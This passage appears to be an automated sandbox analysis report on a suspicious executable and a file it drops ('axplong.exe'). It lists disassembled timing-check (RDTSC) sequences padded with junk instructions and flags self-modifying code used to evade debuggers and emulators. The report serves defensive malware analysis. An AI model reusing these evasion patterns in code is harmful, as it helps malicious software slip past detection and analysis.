                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A75 second address: 4DA0A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, FBh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 3929CB5Ah 0x00000013 call 00007F43A4BB4C2Bh 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA07EB second address: 4DA0814 instructions: 0x00000000 rdtsc 0x00000002 call 00007F43A4FCF6A8h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b mov dh, ah 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0814 second address: 4DA0818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0818 second address: 4DA081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA081E second address: 4DA088C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007F43A4BB4C2Fh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F43A4BB4C2Fh 0x00000014 mov ebp, esp 0x00000016 jmp 00007F43A4BB4C36h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, bx 0x00000022 pushfd 0x00000023 jmp 00007F43A4BB4C39h 0x00000028 jmp 00007F43A4BB4C2Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA088C second address: 4DA0892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0892 second address: 4DA0896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40039 second address: 4D40049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF69Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40049 second address: 4D40058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40058 second address: 4D4005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4005C second address: 4D40060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40060 second address: 4D40066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40066 second address: 4D40091 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push esi 0x0000000e mov ax, di 0x00000011 pop edx 0x00000012 mov esi, 7342FB35h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40091 second address: 4D40095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40095 second address: 4D400B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400B2 second address: 4D400B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400B8 second address: 4D400BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400BC second address: 4D400D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43A4FCF6A2h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400D9 second address: 4D400EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C2Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C4F second address: 4DA0CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43A4FCF6A0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43A4FCF6A1h 0x00000017 add ch, 00000066h 0x0000001a jmp 00007F43A4FCF6A1h 0x0000001f popfd 0x00000020 mov dl, cl 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 jmp 00007F43A4FCF6A9h 0x0000002a pushfd 0x0000002b jmp 00007F43A4FCF6A0h 0x00000030 or esi, 1B284868h 0x00000036 jmp 00007F43A4FCF69Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov dh, 57h 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CED second address: 4DA0D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4BB4C39h 0x00000009 sbb al, 00000036h 0x0000000c jmp 00007F43A4BB4C31h 0x00000011 popfd 0x00000012 mov dh, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a jmp 00007F43A4BB4C33h 0x0000001f push dword ptr [ebp+08h] 0x00000022 jmp 00007F43A4BB4C36h 0x00000027 call 00007F43A4BB4C29h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F43A4BB4C2Eh 0x00000033 and eax, 03BBB1E8h 0x00000039 jmp 00007F43A4BB4C2Bh 0x0000003e popfd 0x0000003f mov si, 75DFh 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F43A4BB4C37h 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D9F second address: 4DA0DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0DA3 second address: 4DA0DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0DA9 second address: 4DA0E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 04639651h 0x00000008 mov edi, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 call 00007F43A4FCF6A9h 0x00000017 pop edx 0x00000018 pushfd 0x00000019 jmp 00007F43A4FCF69Ch 0x0000001e xor esi, 0A8D7908h 0x00000024 jmp 00007F43A4FCF69Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F43A4FCF6A4h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E0D second address: 4DA0E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E13 second address: 4DA0E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E17 second address: 4DA0E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F43A4BB4C31h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E45 second address: 4DA0E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0EC2 second address: 4DA0EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4BB4C37h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87D461 second address: 87D465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50322 second address: 4D503DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43A4BB4C34h 0x00000011 sbb ecx, 1A76BC88h 0x00000017 jmp 00007F43A4BB4C2Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F43A4BB4C38h 0x00000023 and ah, FFFFFFE8h 0x00000026 jmp 00007F43A4BB4C2Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f jmp 00007F43A4BB4C2Fh 0x00000034 push esi 0x00000035 movsx edi, cx 0x00000038 pop eax 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F43A4BB4C2Dh 0x00000042 xor cl, FFFFFFB6h 0x00000045 jmp 00007F43A4BB4C31h 0x0000004a popfd 0x0000004b pushad 0x0000004c mov al, E5h 0x0000004e mov ax, dx 0x00000051 popad 0x00000052 popad 0x00000053 mov ebp, esp 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F43A4BB4C30h 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503DB second address: 4D504B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF6A1h 0x00000009 jmp 00007F43A4FCF69Bh 0x0000000e popfd 0x0000000f mov ebx, esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push FFFFFFFEh 0x00000016 jmp 00007F43A4FCF6A2h 0x0000001b call 00007F43A4FCF699h 0x00000020 pushad 0x00000021 call 00007F43A4FCF69Eh 0x00000026 mov edx, ecx 0x00000028 pop esi 0x00000029 mov dl, 61h 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov dx, 006Ah 0x00000032 pushfd 0x00000033 jmp 00007F43A4FCF69Bh 0x00000038 xor eax, 6AC5B90Eh 0x0000003e jmp 00007F43A4FCF6A9h 0x00000043 popfd 0x00000044 popad 0x00000045 mov eax, dword ptr [esp+04h] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F43A4FCF69Ah 0x00000052 or ax, 0F88h 0x00000057 jmp 00007F43A4FCF69Bh 0x0000005c popfd 0x0000005d pushfd 0x0000005e jmp 00007F43A4FCF6A8h 0x00000063 sbb cl, FFFFFFE8h 0x00000066 jmp 00007F43A4FCF69Bh 0x0000006b popfd 0x0000006c popad 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504B2 second address: 4D50505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov bh, 96h 0x0000000f pop esi 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007F43A4BB4C30h 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F43A4BB4C37h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50505 second address: 4D5050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5050B second address: 4D50520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 0E07E33Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50520 second address: 4D5056D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 693ECAC6h 0x00000010 pushad 0x00000011 jmp 00007F43A4FCF69Eh 0x00000016 mov ah, 96h 0x00000018 popad 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F43A4FCF6A8h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5056D second address: 4D50575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50575 second address: 4D50594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43A4FCF6A5h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50695 second address: 4D50699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50699 second address: 4D5069D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5069D second address: 4D506A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506A3 second address: 4D506D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F43A4FCF6A0h 0x0000000f push eax 0x00000010 jmp 00007F43A4FCF69Bh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506D5 second address: 4D506D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506D9 second address: 4D506DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D506DF second address: 4D50732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [7751B370h] 0x0000000e jmp 00007F43A4BB4C30h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 jmp 00007F43A4BB4C30h 0x0000001b xor eax, ebp 0x0000001d pushad 0x0000001e mov cx, bx 0x00000021 mov ch, bl 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F43A4BB4C31h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50732 second address: 4D50742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF69Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50742 second address: 4D50746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50746 second address: 4D50755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50755 second address: 4D50759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50759 second address: 4D5075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5075F second address: 4D50793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 jmp 00007F43A4BB4C36h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D508EF second address: 4D508F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D508F3 second address: 4D508F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D508F9 second address: 4D50951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF6A3h 0x00000009 and esi, 36A6650Eh 0x0000000f jmp 00007F43A4FCF6A9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [ebp-24h], ebx 0x0000001b pushad 0x0000001c mov esi, 496DC8B3h 0x00000021 popad 0x00000022 test ebx, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F43A4FCF6A0h 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50951 second address: 4D50956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50956 second address: 4D509C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F441769E9B4h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F43A4FCF6A9h 0x00000016 jmp 00007F43A4FCF69Bh 0x0000001b popfd 0x0000001c jmp 00007F43A4FCF6A8h 0x00000021 popad 0x00000022 cmp ebx, FFFFFFFFh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F43A4FCF6A7h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D509C1 second address: 4D509D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C34h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D509D9 second address: 4D50322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F441769E930h 0x0000000d jne 00007F43A4FCF6B9h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 006C5678h 0x00000043 jne 00007F43A4FCF680h 0x00000045 push esi 0x00000046 call 00007F43A4FCFF03h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007F43A96A2AB6h 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F43A4FCF6A2h 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D6E second address: 4D40DA2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F43A4BB4C38h 0x00000008 adc esi, 3FBA0238h 0x0000000e jmp 00007F43A4BB4C2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 movzx eax, dx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DA2 second address: 4D40E2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F43A4FCF69Ah 0x0000000e pushfd 0x0000000f jmp 00007F43A4FCF6A2h 0x00000014 sbb cx, BBC8h 0x00000019 jmp 00007F43A4FCF69Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F43A4FCF6A4h 0x0000002a sbb eax, 043FBE28h 0x00000030 jmp 00007F43A4FCF69Bh 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F43A4FCF6A6h 0x0000003e xor cx, 7088h 0x00000043 jmp 00007F43A4FCF69Bh 0x00000048 popfd 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E2F second address: 4D40E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E54 second address: 4D40E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E71 second address: 4D40E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4BB4C2Dh 0x00000011 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A7865C second address: A78674 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43A4FCF698h 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F43A4FCF698h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1CC second address: A8A1D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1D4 second address: A8A1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1D8 second address: A8A1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A1DC second address: A8A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: A8A315 second address: A8A31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6CE90E instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6CE822 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 873FB5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8F9E72 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 90E90E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 90E822 instructions caused by: Self-modifying code
